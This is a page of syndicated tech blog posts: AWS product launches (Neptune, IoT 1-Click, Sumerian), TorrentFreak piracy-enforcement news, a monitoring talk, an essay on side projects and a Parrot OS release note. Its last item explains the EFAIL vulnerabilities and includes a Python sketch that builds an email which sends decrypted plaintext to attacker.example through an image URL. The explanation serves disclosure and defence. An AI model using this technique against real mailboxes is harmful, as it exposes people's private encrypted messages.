Amazon Neptune is now Generally Available in US East (N. Virginia), US East (Ohio), US West (Oregon), and EU (Ireland). Amazon Neptune is a fast, reliable, fully-managed graph database service that makes it easy to build and run applications that work with highly connected datasets. At the core of Neptune is a purpose-built, high-performance graph database engine optimized for storing billions of relationships and querying the graph with millisecond latencies. Neptune supports two popular graph models, Property Graph and RDF, through Apache TinkerPop Gremlin and SPARQL, allowing you to easily build queries that efficiently navigate highly connected datasets. Neptune can be used to power everything from recommendation engines and knowledge graphs to drug discovery and network security. Neptune is fully-managed with automatic minor version upgrades, backups, encryption, and fail-over. I wrote about Neptune in detail for AWS re:Invent last year and customers have been using the preview and providing great feedback that the team has used to prepare the service for GA.

Now that Amazon Neptune is generally available there are a few changes from the preview:

Launching an Amazon Neptune Cluster

Launching a Neptune cluster is as easy as navigating to the AWS Management Console and clicking create cluster. Of course you can also launch with CloudFormation, the CLI, or the SDKs.
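If you prefer the SDK, a minimal boto3 sketch might look like the following. Treat it as a sketch only: the identifiers and instance class are placeholders, and in practice you would also supply your VPC, subnet group, and security settings:

import boto3

neptune = boto3.client('neptune')

# Create the cluster, then add a database instance to it.
neptune.create_db_cluster(
    DBClusterIdentifier='my-neptune-cluster',   # placeholder name
    Engine='neptune',
)
neptune.create_db_instance(
    DBInstanceIdentifier='my-neptune-instance', # placeholder name
    DBClusterIdentifier='my-neptune-cluster',
    DBInstanceClass='db.r4.large',
    Engine='neptune',
)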

You can monitor your cluster health and the health of individual instances through Amazon CloudWatch and the console.

Additional Resources

We’ve created two repos with some additional tools and examples here. You can expect continuous development on these repos as we add additional tools and examples.

  • Amazon Neptune Tools Repo
    This repo has a useful tool for converting GraphML files into Neptune compatible CSVs for bulk loading from S3.
  • Amazon Neptune Samples Repo
    This repo has a really cool example of building a collaborative filtering recommendation engine for video game preferences.

Purpose Built Databases

There’s an industry trend where we’re moving more and more onto purpose-built databases. Developers and businesses want to access their data in the format that makes the most sense for their applications. As cloud resources make transforming large datasets easier with tools like AWS Glue, we have a lot more options than we used to for accessing our data. With tools like Amazon Redshift, Amazon Athena, Amazon Aurora, Amazon DynamoDB, and more we get to choose the best database for the job or even enable entirely new use-cases. Amazon Neptune is perfect for workloads where the data is highly connected across data rich edges.

I’m really excited about graph databases and I see a huge number of applications. Looking for ideas of cool things to build? I’d love to build a web crawler in AWS Lambda that uses Neptune as the backing store. You could further enrich it by running Amazon Comprehend or Amazon Rekognition on the text and images found and creating a search engine on top of Neptune.

As always, feel free to reach out in the comments or on twitter to provide any feedback!

Randall

FCC Asks Amazon & eBay to Help Eliminate Pirate Media Box Sales

Post Syndicated from Andy original https://torrentfreak.com/fcc-asks-amazon-ebay-to-help-eliminate-pirate-media-box-sales-180530/

Over the past several years, anyone looking for a piracy-configured set-top box could do worse than search for one on Amazon or eBay.

Historically, people deploying search terms including “Kodi” or “fully-loaded” were greeted by page after page of Android-type boxes, each ready for illicit plug-and-play entertainment consumption following delivery.

Although the problem persists on both platforms, people are now much less likely to find infringing devices than they were 12 to 24 months ago. Under pressure from entertainment industry groups, both Amazon and eBay have tightened the screws on sellers of such devices. Now, however, both companies have received requests to stem sales from a completely different direction.

In a letter to eBay CEO Devin Wenig and Amazon CEO Jeff Bezos first spotted by Ars, FCC Commissioner Michael O’Rielly calls on the platforms to take action against piracy-configured boxes that fail to comply with FCC equipment authorization requirements or falsely display FCC logos, contrary to United States law.

“Disturbingly, some rogue set-top box manufacturers and distributors are exploiting the FCC’s trusted logo by fraudulently placing it on devices that have not been approved via the Commission’s equipment authorization process,” O’Rielly’s letter reads.

“Specifically, nine set-top box distributors were referred to the FCC in October for enabling the unlawful streaming of copyrighted material, seven of which displayed the FCC logo, although there was no record of such compliance.”

While O’Rielly admits that the copyright infringement aspects fall outside the jurisdiction of the FCC, he says it’s troubling that many of these devices are used to stream infringing content, “exacerbating the theft of billions of dollars in American innovation and creativity.”

As noted above, both Amazon and eBay have taken steps to reduce sales of pirate boxes on their respective platforms on copyright infringement grounds, something which is duly noted by O’Rielly. However, he points out that devices continue to be sold to members of the public who may believe that the devices are legal since they’re available for sale from legitimate companies.

“For these reasons, I am seeking your further cooperation in assisting the FCC in taking steps to eliminate the non-FCC compliant devices or devices that fraudulently bear the FCC logo,” the Commissioner writes (pdf).

“Moreover, if your company is made aware by the Commission, with supporting evidence, that a particular device is using a fraudulent FCC label or has not been appropriately certified and labeled with a valid FCC logo, I respectfully request that you commit to swiftly removing these products from your sites.”

In the event that Amazon and eBay take action under this request, O’Rielly asks both platforms to hand over information they hold on offending manufacturers, distributors, and suppliers.

Amazon was quick to respond to the FCC. In a letter published by Ars, Amazon’s Public Policy Vice President Brian Huseman assured O’Rielly that the company is not only dedicated to tackling rogue devices on copyright-infringement grounds but also when there is fraudulent use of the FCC’s logos.

Noting that Amazon is a key member of the Alliance for Creativity and Entertainment (ACE) – a group that has been taking legal action against sellers of infringing streaming devices (ISDs) and those who make infringing addons for Kodi-type systems – Huseman says that dealing with the problem is a top priority.

“Our goal is to prevent the sale of ISDs anywhere, as we seek to protect our customers from the risks posed by these devices, in addition to our interest in protecting Amazon Studios content,” Huseman writes.

“In 2017, Amazon became the first online marketplace to prohibit the sale of streaming media players that promote or facilitate piracy. To prevent the sale of these devices, we proactively scan product listings for signs of potentially infringing products, and we also invest heavily in sophisticated, automated real-time tools to review a variety of data sources and signals to identify inauthentic goods.

“These automated tools are supplemented by human reviewers that conduct manual investigations. When we suspect infringement, we take immediate action to remove suspected listings, and we also take enforcement action against sellers’ entire accounts when appropriate.”

Huseman also reveals that since implementing a proactive policy against such devices, “tens of thousands” of listings have been blocked from Amazon. In addition, the platform has been making criminal referrals to law enforcement as well as taking civil action (1,2,3) as part of ACE.

“As noted in your letter, we would also appreciate the opportunity to collaborate further with the FCC to remove non-compliant devices that improperly use the FCC logo or falsely claim FCC certification. If any FCC non-compliant devices are identified, we seek to work with you to ensure they are not offered for sale,” Huseman concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Monitoring for Everyone

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/05/23/monitoring-for-everyone/

Øredev – Carl Bergquist – Monitoring for Everyone
What is monitoring?
What do the terms log, metric, and distributed tracing actually mean?
What makes a good alert?
Why should I care?
At a recent developer conference in Malmö, Sweden, I gave a presentation on monitoring and observability to discuss the high level concepts and common tools that are out there. Monitoring and observability can easily become quite complex, but at the heart of it, we simply want to know how our systems are performing, and when performance drops – be able to find out why.

The Benefits of Side Projects

Post Syndicated from Bozho original https://techblog.bozho.net/the-benefits-of-side-projects/

Side projects are the things you do at home, after work, for your own “entertainment”, or to satisfy your desire to learn new stuff, in case your workplace doesn’t give you that opportunity (or at least not enough of it). Side projects are also a way to build stuff that you think is valuable but not necessarily “commercialisable”. Many side projects are open-sourced sooner or later and some of them contribute to the pool of tools at other people’s disposal.

I’ve outlined one recommendation about side projects before – do them with technologies that are new to you, so that you learn important things that will keep you better positioned in the software world.

But there are more benefits than that – serendipitous benefits, for example. And I’d like to tell some personal stories about that. I’ll focus on a few examples from my list of side projects to show how, through a sort-of butterfly effect, they helped shape my career.

The computoser project, no matter how cool algorithmic music composition is, didn’t manage to have much of a long-term impact. But it did teach me something apart from niche musical theory – how to read a bulk of scientific papers (mostly computer science) and understand them without being formally trained in the particular field. We’ll see how that was useful later.

Then there was the “State alerts” project – a website that scraped content from public institutions in my country (legislation, legislation proposals, decisions by regulators, new tenders, etc.), made them searchable, and “subscribable” – so that you get notified when a keyword of interest is mentioned in newly proposed legislation, for example. (I obviously subscribed for “information technologies” and “electronic”).

And that project turned out to have a significant impact on the following years. First, I chose a new technology to write it with – Scala. Which turned out to be of great use when I started working at TomTom, and on the 3rd day I was transferred to a Scala project, which was way cooler and much more complex than the original one I was hired for. It was a bit ironic, as my colleagues had just read that “I don’t like Scala” a few weeks earlier, but nevertheless, that was one of the most interesting projects I’ve worked on, and it went on for two years. Had I not known Scala, I’d probably be gone from TomTom much earlier (as the other project was restructured a few times), and I would not have learned many of the scalability, architecture and AWS lessons that I did learn there.

But the very same project had an even more important follow-up. Because of its “civic hacking” flavour, I was invited to join an informal group of developers (later formalized as an NGO) who create tools that are useful for society (something like MySociety.org). That group gathered regularly, discussed both tools and policies, and at some point we put up a list of policy priorities that we wanted to lobby policy makers for. One of them was open source for the government, the other one was open data. As a result of our interaction with an interim government, we donated the official open data portal of my country, which is functioning to this day.

As a result of that, a few months later we got a proposal from the deputy prime minister’s office to “elect” one of the group for an advisor to the cabinet. And we decided that could be me. So I went for it and became advisor to the deputy prime minister. The job has nothing to do with anything one could imagine, and it was challenging and fascinating. We managed to pass legislation, including one that requires open source for custom projects, eID and open data. And all of that would not have been possible without my little side project.

As for my latest side project, LogSentinel – it became my current startup company. And not without help from the previous two mentioned above – the computer science paper reading was of great use when I was navigating the crypto papers landscape, and from the government job I not only gained invaluable legal knowledge, but I also “got” a co-founder.

Some other side projects died without much fanfare, and that’s fine. But the ones above shaped my “story” in a way that would not have been possible otherwise.

And I agree that such a serendipitous chain of events could have happened without side projects – I could’ve gotten these opportunities by meeting someone at a bar (unlikely, but who knows). But we, as software engineers, are capable of tilting chance towards us by utilizing our skills. Side projects are our “extracurricular activities”, and they often lead to unpredictable, but rather positive chains of events. They would rarely be the only factor, but they are certainly great at unlocking potential.

The post The Benefits of Side Projects appeared first on Bozho's tech blog.

Despite US Criticism, Ukraine Cybercrime Chief Receives Few Piracy Complaints

Post Syndicated from Andy original https://torrentfreak.com/despite-us-criticism-ukraine-cybercrime-chief-receives-few-piracy-complaints-180522/

On a large number of occasions over the past decade, Ukraine has played host to some of the world’s largest pirate sites.

At various points over the years, The Pirate Bay, KickassTorrents, ExtraTorrent, Demonoid and a raft of streaming portals could be found housed in the country’s data centers, reportedly taking advantage of laws more favorable than those in the US and EU.

As a result, Ukraine has been regularly criticized for not doing enough to combat piracy but when placed under pressure, it does take action. In 2010, for example, the local government expressed concerns about the hosting of KickassTorrents in the country and in August the same year, the site was kicked out by its host.

“Kickasstorrents.com main web server was shut down by the hosting provider after it was contacted by local authorities. One way or another I’m afraid we must say goodbye to Ukraine and move the servers to other countries,” the site’s founder told TF at the time.

In the years since, Ukraine has launched sporadic action against pirate sites and has taken steps to tighten up copyright law. The Law on State Support of Cinematography came into force during April 2017 and gave copyright owners new tools to combat infringement by forcing (in theory, at least) site operators and web hosts to respond to takedown requests.

But according to the United States and Europe, not enough is being done. After the EU Commission warned that Ukraine risked damaging relations with the EU, last September US companies followed up with another scathing attack.

In a recommendation to the U.S. Government, the IIPA, which counts the MPAA, RIAA, and ESA among its members, asked U.S. authorities to suspend or withdraw Ukraine’s trade benefits until the online piracy situation improves.

“Legislation is needed to institute proper notice and takedown provisions, including a requirement that service providers terminate access to individuals (or entities) that have repeatedly engaged in infringement, and the retention of information for law enforcement, as well as to provide clear third party liability regarding ISPs,” the IIPA wrote.

But amid all the criticism, Ukraine cyber police chief Sergey Demedyuk says that while his department is committed to tackling piracy, it can only do so when complaints are filed with him.

“Yes, we are engaged in piracy very closely. The problem is that piracy is a crime of private accusation. So here we deal with them only in cases where we are contacted,” Demedyuk said in an Interfax interview published yesterday.

Surprisingly, given the number of dissenting voices, it appears that complaints about these matters aren’t exactly prevalent. So are there many at all?

“Unfortunately, no. In the media, many companies claim that their rights are being violated by pirates. But if you count the applications that come to us, they are one,” Demedyuk reveals.

“In general, we are handling Ukrainian media companies, who produce their own product and are worried about its fate. Also on foreign films, the ‘Anti-Piracy Agency’ refers to us, but not as intensively as before.”

Why complaints are going down, Demedyuk does not know, but when his unit is asked to take action it does so, he claims. Indeed, Demedyuk cites two particularly significant historical operations against a pair of large ‘pirate’ sites.

In 2012, Ukraine shut down EX.ua, a massive cyberlocker site following a six-month investigation initiated by international tech companies including Microsoft, Graphisoft and Adobe. Around 200 servers were seized, together hosting around 6,000 terabytes of data.

Then in November 2016, following a complaint from the MPAA, police raided FS.to, one of Ukraine’s most popular pirate sites. Initial reports indicated that 60 servers were seized and 19 people were arrested.

“To see the effect of combating piracy, this should not be done at the level of cyberpolice, but at the state level,” Demedyuk advises.

“This requires constant close interaction between law enforcement agencies and rights holders. Only by using all these tools will we be able to effectively counteract copyright infringements.”

Meanwhile, the Office of the United States Trade Representative has maintained Ukraine’s position on the Priority Watch List of its latest Special 301 Report, and there are no signs it will be leaving anytime soon.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Parrot 4.0 is out

Post Syndicated from ris original https://lwn.net/Articles/755095/rss

Parrot 4.0 has been released. Parrot is a security-oriented distribution aimed at penetration tests and digital forensics analysis, with additional tools to preserve privacy. “On Parrot 4.0 we decided to provide netinstall images too as we would like people to use Parrot not only as a pentest distribution, but also as a framework to build their very own working environment with ease. Docker templates are also available.”

AWS IoT 1-Click – Use Simple Devices to Trigger Lambda Functions

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-iot-1-click-use-simple-devices-to-trigger-lambda-functions/

We announced a preview of AWS IoT 1-Click at AWS re:Invent 2017 and have been refining it ever since, focusing on simplicity and a clean out-of-box experience. Designed to make IoT available and accessible to a broad audience, AWS IoT 1-Click is now generally available, along with new IoT buttons from AWS and AT&T.

I sat down with the dev team a month or two ago to learn about the service so that I could start thinking about my blog post. During the meeting they gave me a pair of IoT buttons and I started to think about some creative ways to put them to use. Here are a few that I came up with:

Help Request – Earlier this month I spent a very pleasant weekend at the HackTillDawn hackathon in Los Angeles. As the participants were hacking away, they occasionally had questions about AWS, machine learning, Amazon SageMaker, and AWS DeepLens. While we had plenty of AWS Solution Architects on hand (decked out in fashionable & distinctive AWS shirts for easy identification), I imagined an IoT button for each team. Pressing the button would alert the SA crew via SMS and direct them to the proper table.

Camera Control – Tim Bray and I were in the AWS video studio, prepping for the first episode of Tim’s series on AWS Messaging. Minutes before we opened the Twitch stream I realized that we did not have a clean, unobtrusive way to ask the camera operator to switch to a closeup view. Again, I imagined that a couple of IoT buttons would allow us to make the request.

Remote Dog Treat Dispenser – My dog barks every time a stranger opens the gate in front of our house. While it is great to have confirmation that my Ring doorbell is working, I would like to be able to press a button and dispense a treat so that Luna stops barking!

Homes, offices, factories, schools, vehicles, and health care facilities can all benefit from IoT buttons and other simple IoT devices, all managed using AWS IoT 1-Click.

All About AWS IoT 1-Click
As I said earlier, we have been focusing on simplicity and a clean out-of-box experience. Here’s what that means:

Architects can dream up applications for inexpensive, low-powered devices.

Developers don’t need to write any device-level code. They can make use of pre-built actions, which send email or SMS messages, or write their own custom actions using AWS Lambda functions.

Installers don’t have to install certificates or configure cloud endpoints on newly acquired devices, and don’t have to worry about firmware updates.

Administrators can monitor the overall status and health of each device, and can arrange to receive alerts when a device nears the end of its useful life and needs to be replaced, using a single interface that spans device types and manufacturers.

I’ll show you how easy this is in just a moment. But first, let’s talk about the current set of devices that are supported by AWS IoT 1-Click.

Who’s Got the Button?
We’re launching with support for two types of buttons (both pictured above). Both types of buttons are pre-configured with X.509 certificates, communicate to the cloud over secure connections, and are ready to use.

The AWS IoT Enterprise Button communicates via Wi-Fi. It has a 2000-click lifetime, encrypts outbound data using TLS, and can be configured using BLE and our mobile app. It retails for $19.99 (shipping and handling not included) and can be used in the United States, Europe, and Japan.

The AT&T LTE-M Button communicates via the LTE-M cellular network. It has a 1500-click lifetime, and also encrypts outbound data using TLS. The device and the bundled data plan are available at an introductory price of $29.99 (shipping and handling not included), and can be used in the United States.

We are very interested in working with device manufacturers in order to make even more shapes, sizes, and types of devices (badge readers, asset trackers, motion detectors, and industrial sensors, to name a few) available to our customers. Our team will be happy to tell you about our provisioning tools and our facility for pushing OTA (over the air) updates to large fleets of devices; you can contact them at [email protected].

AWS IoT 1-Click Concepts
I’m eager to show you how to use AWS IoT 1-Click and the buttons, but need to introduce a few concepts first.

Device – A button or other item that can send messages. Each device is uniquely identified by a serial number.

Placement Template – Describes a like-minded collection of devices to be deployed. Specifies the action to be performed and lists the names of custom attributes for each device.

Placement – A device that has been deployed. Referring to placements instead of devices gives you the freedom to replace and upgrade devices with minimal disruption. Each placement can include values for custom attributes such as a location (“Building 8, 3rd Floor, Room 1337”) or a purpose (“Coffee Request Button”).

Action – The AWS Lambda function to invoke when the button is pressed. You can write a function from scratch, or you can make use of a pair of predefined functions that send an email or an SMS message. The actions have access to the attributes; you can, for example, send an SMS message with the text “Urgent need for coffee in Building 8, 3rd Floor, Room 1337.”
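To make the Action concept a little more concrete, here is a minimal sketch of a custom Lambda action in Python. It assumes, based on my reading of the service (so treat the field names as assumptions), that the incoming event carries the placement attributes under placementInfo.attributes and the click type under deviceEvent.buttonClicked, and it uses Amazon SNS to send the SMS; the phoneNumber attribute is a hypothetical addition for this sketch:

```python
import boto3

sns = boto3.client("sns")


def lambda_handler(event, context):
    # Placement attributes for the button that was pressed
    # (assumed event shape: placementInfo.attributes).
    attrs = event.get("placementInfo", {}).get("attributes", {})
    click = event.get("deviceEvent", {}).get("buttonClicked", {}).get("clickType", "SINGLE")

    message = "Urgent need for coffee in Building {}, Floor {}, Room {} ({} click)".format(
        attrs.get("Building", "?"),
        attrs.get("Floor", "?"),
        attrs.get("Room", "?"),
        click,
    )

    # In this sketch the phone number comes from a hypothetical placement
    # attribute; the pre-built SMS action takes it as a built-in parameter.
    sns.publish(PhoneNumber=attrs.get("phoneNumber", "+15555550100"), Message=message)
    return {"message": message}
```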

Getting Started with AWS IoT 1-Click
Let’s set up an IoT button using the AWS IoT 1-Click Console:

If I didn’t have any buttons I could click Buy devices to get some. But, I do have some, so I click Claim devices to move ahead. I enter the device ID or claim code for my AT&T button and click Claim (I can enter multiple claim codes or device IDs if I want):

The AWS buttons can be claimed using the console or the mobile app; the first step is to use the mobile app to configure the button to use my Wi-Fi:

Then I scan the barcode on the box and click the button to complete the process of claiming the device. Both of my buttons are now visible in the console:

I am now ready to put them to use. I click on Projects, and then Create a project:

I name and describe my project, and click Next to proceed:

Now I define a device template, along with names and default values for the placement attributes. Here’s how I set up a device template (projects can contain several, but I just need one):

The action has two mandatory parameters (phone number and SMS message) built in; I add three more (Building, Room, and Floor) and click Create project:

I’m almost ready to ask for some coffee! The next step is to associate my buttons with this project by creating a placement for each one. I click Create placements to proceed. I name each placement, select the device to associate with it, and then enter values for the attributes that I established for the project. I can also add additional attributes that are peculiar to this placement:
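The console steps above can also be scripted. Here is a rough boto3 sketch of creating the project, the device template, and a placement; the client name and parameter shapes follow my understanding of the IoT 1-Click Projects API and should be treated as assumptions, and the device serial is hypothetical:

```python
import boto3

# Assumed boto3 client name for the IoT 1-Click Projects API.
projects = boto3.client("iot1click-projects")

# Create a project whose device template carries Building/Floor/Room
# defaults, mirroring the attributes used in this walkthrough.
projects.create_project(
    projectName="CoffeeRequests",
    description="Buttons that page an SA with a coffee request",
    placementTemplate={
        "defaultAttributes": {"Building": "8", "Floor": "3", "Room": "1337"},
        "deviceTemplates": {
            "coffeeButton": {
                "deviceType": "button",
                # callbackOverrides (omitted here) can point the template
                # at a custom Lambda action.
            }
        },
    },
)

# Create a placement and associate a claimed device with it.
projects.create_placement(
    projectName="CoffeeRequests",
    placementName="hackathon-table-1",
    attributes={"Room": "Main Hall"},
)
projects.associate_device_with_placement(
    projectName="CoffeeRequests",
    placementName="hackathon-table-1",
    deviceTemplateName="coffeeButton",
    deviceId="G030PM0000000000",  # hypothetical device serial
)
```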

I can inspect my project and see that everything looks good:

I click on the buttons and the SMS messages appear:

I can monitor device activity in the AWS IoT 1-Click Console:

And also in the Lambda Console:

The Lambda function itself is also accessible, and can be used as-is or customized:

As you can see, this is the code that lets me use {{*}} to include all of the placement attributes in the message and {{Building}} (for example) to include a specific placement attribute.
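Conceptually, that substitution is just template expansion over the placement attributes. Here is an illustrative sketch of how {{Building}} and {{*}} might be expanded; it is not the actual function’s code, just the idea:

```python
import re


def expand_message(template, attributes):
    """Expand {{Name}} placeholders and {{*}} against placement attributes.
    Illustrative only; the real pre-built action may differ."""
    # {{*}} -> every attribute as "key: value" pairs.
    all_attrs = ", ".join(f"{k}: {v}" for k, v in sorted(attributes.items()))
    expanded = template.replace("{{*}}", all_attrs)
    # {{Building}}, {{Floor}}, ... -> the matching attribute value.
    return re.sub(r"\{\{(\w+)\}\}",
                  lambda m: str(attributes.get(m.group(1), m.group(0))),
                  expanded)


print(expand_message(
    "Urgent need for coffee in Building {{Building}}, Floor {{Floor}}, Room {{Room}}",
    {"Building": "8", "Floor": "3", "Room": "1337"},
))
# -> Urgent need for coffee in Building 8, Floor 3, Room 1337
```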

Now Available
I’ve barely scratched the surface of this cool new service and I encourage you to give it a try (or a click) yourself. Buy a button or two, build something cool, and let me know all about it!

Pricing is based on the number of enabled devices in your account, measured monthly and pro-rated for partial months. Devices can be enabled or disabled at any time. See the AWS IoT 1-Click Pricing page for more info.

To learn more, visit the AWS IoT 1-Click home page or read the AWS IoT 1-Click documentation.

Jeff;

 

Amazon Sumerian – Now Generally Available

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/amazon-sumerian-now-generally-available/

We announced Amazon Sumerian at AWS re:Invent 2017. As you can see from Tara‘s blog post (Presenting Amazon Sumerian: An Easy Way to Create VR, AR, and 3D Experiences), Sumerian does not require any specialized programming or 3D graphics expertise. You can build VR, AR, and 3D experiences for a wide variety of popular hardware platforms including mobile devices, head-mounted displays, digital signs, and web browsers.

I’m happy to announce that Sumerian is now generally available. You can create realistic virtual environments and scenes without having to acquire or master specialized tools for 3D modeling, animation, lighting, audio editing, or programming. Once built, you can deploy your finished creation across multiple platforms without having to write custom code or deal with specialized deployment systems and processes.

Sumerian gives you a web-based editor that you can use to quickly and easily create realistic, professional-quality scenes. There’s a visual scripting tool that lets you build logic to control how objects and characters (Sumerian Hosts) respond to user actions. Sumerian also lets you create rich, natural interactions powered by AWS services such as Amazon Lex, Polly, AWS Lambda, AWS IoT, and Amazon DynamoDB.

Sumerian was designed to work on multiple platforms. The VR and AR apps that you create in Sumerian will run in browsers that support WebGL or WebVR and on popular devices such as the Oculus Rift, HTC Vive, and those powered by iOS or Android.

During the preview period, we have been working with a broad spectrum of customers to put Sumerian to the test and to create proof of concept (PoC) projects designed to highlight an equally broad spectrum of use cases, including employee education, training simulations, field service productivity, virtual concierge, design and creative, and brand engagement. Fidelity Labs (the internal R&D unit of Fidelity Investments) was the first to use a Sumerian host to create an engaging VR experience. Cora (the host) lives within a virtual chart room. She can display stock quotes, pull up company charts, and answer questions about a company’s performance. This PoC uses Amazon Polly to implement text-to-speech and Amazon Lex for conversational chatbot functionality. Read their blog post and watch the video inside to see Cora in action:

Now that Sumerian is generally available, you have the power to create engaging AR, VR, and 3D experiences of your own. To learn more, visit the Amazon Sumerian home page and then spend some quality time with our extensive collection of Sumerian Tutorials.

Jeff;

 

Serious vulnerabilities with OpenPGP and S/MIME

Post Syndicated from corbet original https://lwn.net/Articles/754370/rss

The efail.de site describes a set of vulnerabilities in the handling of OpenPGP- and S/MIME-encrypted email that can cause the disclosure of encrypted communications, including old messages. “In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.”
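To make the mechanism a bit more concrete, here is a simplified sketch of the “direct exfiltration” variant described in the efail.de write-up: the attacker wraps a previously captured ciphertext between two HTML fragments, so that a vulnerable client which decrypts the middle part and renders all parts as one HTML document ends up requesting a URL containing the plaintext. The MIME structure is simplified and the addresses and ciphertext are placeholders:

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication

msg = MIMEMultipart("mixed")
msg["Subject"] = "EFAIL direct-exfiltration sketch (simplified)"

# Part 1: an <img> tag whose src attribute is deliberately left open.
msg.attach(MIMEText('<img src="http://attacker.example/', "html"))

# Part 2: the captured encrypted message (placeholder bytes; real PGP/MIME
# uses a multipart/encrypted structure, simplified here for clarity).
msg.attach(MIMEApplication(b"-----BEGIN PGP MESSAGE-----\n...\n-----END PGP MESSAGE-----",
                           "octet-stream"))

# Part 3: closes the URL and the tag.
msg.attach(MIMEText('">', "html"))

# A vulnerable client decrypts part 2, renders the three parts as a single
# HTML document, and therefore fetches
#   http://attacker.example/<decrypted plaintext>
# leaking the plaintext to the attacker's server via the request URL.
print(msg.as_string())
```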

The EFF recommends entirely uninstalling email-encryption tools that automatically decrypt email. “Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.”